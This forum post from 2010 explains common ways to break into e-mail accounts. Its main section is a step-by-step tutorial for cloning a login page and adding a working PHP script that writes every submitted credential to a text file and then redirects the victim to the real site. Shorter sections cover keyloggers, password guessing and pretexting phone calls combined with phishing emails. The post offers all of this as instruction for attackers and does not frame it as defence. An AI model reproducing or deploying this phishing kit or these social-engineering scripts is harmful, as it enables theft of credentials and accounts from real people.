E-mail hacking common method

Go down

E-mail hacking common method

Post  Admin on Sun Jan 10, 2010 12:22 am

orginally posted in

Email hacking

most common methods of email hacking

Phishing - Phishing is by far the most used and easiest method. The attacker simply sets up a page that looks exactly like the real email login page and tricks people into entering their login information.

Now, let’s look at how they create these phishing pages in the first place with step-by-step instructions. Knowledge of PHP and HTML will be very useful for creating fake login pages. By reading the rest of this post,

1. Select a target website and navigate to their login page.
2. Save the whole page by going to File->Save Page As.. You will now have an HTML file and a folder full of images and maybe some JavaScript files. Rename the HTML file to index.html and create another file called list.txt. This text file will hold the login credentials of the victims.
3. Create a PHP file and name it “phish.php”.
4. Paste the following code into the previously made PHP file. This code is what takes the login details and stores it in the file “list.txt” and then redirects to the real website. This way the user will think he put in the wrong login information and will succeed the second time since it is now the real website.

Header("Location: http://www.RealSite.com");

$handle = fopen("list.txt", "a");

foreach($_GET as $variable => $value) {

fwrite($handle, $variable);

fwrite($handle, "=");

fwrite($handle, $value);

fwrite($handle, "\r\n");

}fwrite($handle, "\r\n");




6. Now we must point the login form in the HTML file to the PHP file. Locate the form code in html file and change the action link to the PHP file and the method type to GET so that the submitted information is passed through the URL. The HTML code should start like this:

< form action =”sitelinkhere.com” method=”GET”>
7. Once everything is complete, upload the files to a free webhost that supports PHP.

8. That’s it! You’ve just created a phishing page

Malware - Attackers can infect computers with malware such as Trojan horses that could extract all the saved passwords on a computer or a key logger that will log all the victims typed passwords.

Guessing- The attacker could literally guess the password if the victim uses an easy password like his/her name, birthday, and favorite something, pets name, or something similar. If the attacker knows the victim well enough this attack won’t be that difficult to carry out.

Social Engineering - The attacker could literally ask for your password by calling up the victim and pretending to be an IT employee of the company. Once the victims trust is gained, the attacker would then make up a story saying something like the victims password is needed to do some updates because the user database is down or some other bogus. The attacker could also use social engineering along with a phishing page. This would be done by sending the victim a n email that looks like it is from the real email provider. In the email would be a link to his phishing page telling the victim that he/she needs to login and update or change some information immediately for whatever reason.


Posts : 39
Join date : 2010-01-09

View user profile http://trickofday.board-directory.net

Back to top Go down

Back to top

- Similar topics

Permissions in this forum:
You cannot reply to topics in this forum